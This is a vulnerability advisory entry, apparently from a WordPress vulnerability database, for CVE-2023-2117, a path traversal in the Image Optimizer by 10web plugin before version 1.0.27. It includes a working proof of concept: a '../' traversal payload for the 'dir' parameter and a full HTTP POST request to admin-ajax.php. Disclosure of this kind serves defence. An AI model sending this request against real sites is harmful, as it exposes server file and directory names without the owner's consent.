Lucene search
Chien VuongWPEX-ID:44024299-BA40-4DA7-81E1-BD44D10846F3HistoryMay 02, 2023 - 12:00 a.m.
Image Optimizer by 10web < 1.0.27 - Admin+ Path Traversal
2023-05-0200:00:00
Chien Vuong
152
image optimizer
10web
admin+ path traversal
payload
http
csrf
exploit
EPSS
0.001
Percentile
23.5%
The plugin does not sanitize the dir parameter when handling the get_subdirs ajax action, allowing a high privileged users such as admins to inspect names of files and directories outside of the sites root.
- Payload: ../../../../../../../../../../../../../../../../../../../
- At the "Other directory" function, select a directory -> At param "dir" add payload: ../../../../../../../../../../ ../ ../../../../../../../../../../..
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Referer: http://localhost/wordpress/wp-admin/admin.php?page=iowd_settings
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 102
Cookie: [Admiin+]
action=get_subdirs&nonce_iowd=xxxxxxxxxx&dir=../../../../../../../../../../../../../../../../../../../Related
nvd
nvd
CVE-2023-2117
2023-05-30 08:15:09
wpvulndb
wpvulndb
Image Optimizer by 10web < 1.0.27 - Admin+ Path Traversal
2023-05-02 00:00:00
cve
cve
CVE-2023-2117
2023-05-30 08:15:09
prion
prion
Design/Logic Flaw
2023-05-30 08:15:00
cvelist
cvelist
CVE-2023-2117 Image Optimizer by 10web < 1.0.27 - Admin+ Path Traversal
2023-05-30 07:49:17
wordfence
wordfence